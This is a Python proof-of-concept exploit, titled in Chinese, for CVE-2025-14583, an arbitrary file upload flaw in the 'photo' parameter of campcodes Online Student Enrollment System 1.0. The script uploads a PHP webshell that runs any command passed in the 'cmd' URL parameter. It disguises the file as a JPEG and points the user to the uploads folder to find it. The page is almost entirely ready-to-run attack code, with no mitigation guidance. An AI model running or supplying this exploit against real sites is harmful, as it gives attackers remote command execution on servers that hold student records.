CVE-2025-14583 campcodes学生注册系统photo参数任意文件上传漏洞

import requests import sys # CVE-2025-14583 PoC - campcodes Online Student Enrollment System 1.0 # Arbitrary File Upload via photo parameter in /admin/register.php def exploit(target_url): """ Exploit for CVE-2025-14583 Upload malicious PHP file via photo parameter """ upload_url = f"{target_url}/admin/register.php" # PHP webshell content webshell = "<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>" # Prepare malicious file with image extension files = { 'photo': ('shell.php', webshell, 'image/jpeg') } # Additional POST data typically required data = { 'firstname': 'test', 'lastname': 'test', 'email': '[email protected]', 'password': 'test123', 'submit': 'Register' } try: response = requests.post(upload_url, files=files, data=data, timeout=10) print(f"[*] Request sent to {upload_url}") print(f"[*] Status Code: {response.status_code}") # Check for successful upload indicators if response.status_code == 200: print("[+] File upload request completed") print("[*] Check if shell was uploaded to /admin/uploads/ or similar directory") except requests.RequestException as e: print(f"[-] Error: {e}") if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} http://vulnerable-site.com") sys.exit(1) target = sys.argv[1].rstrip('/') exploit(target)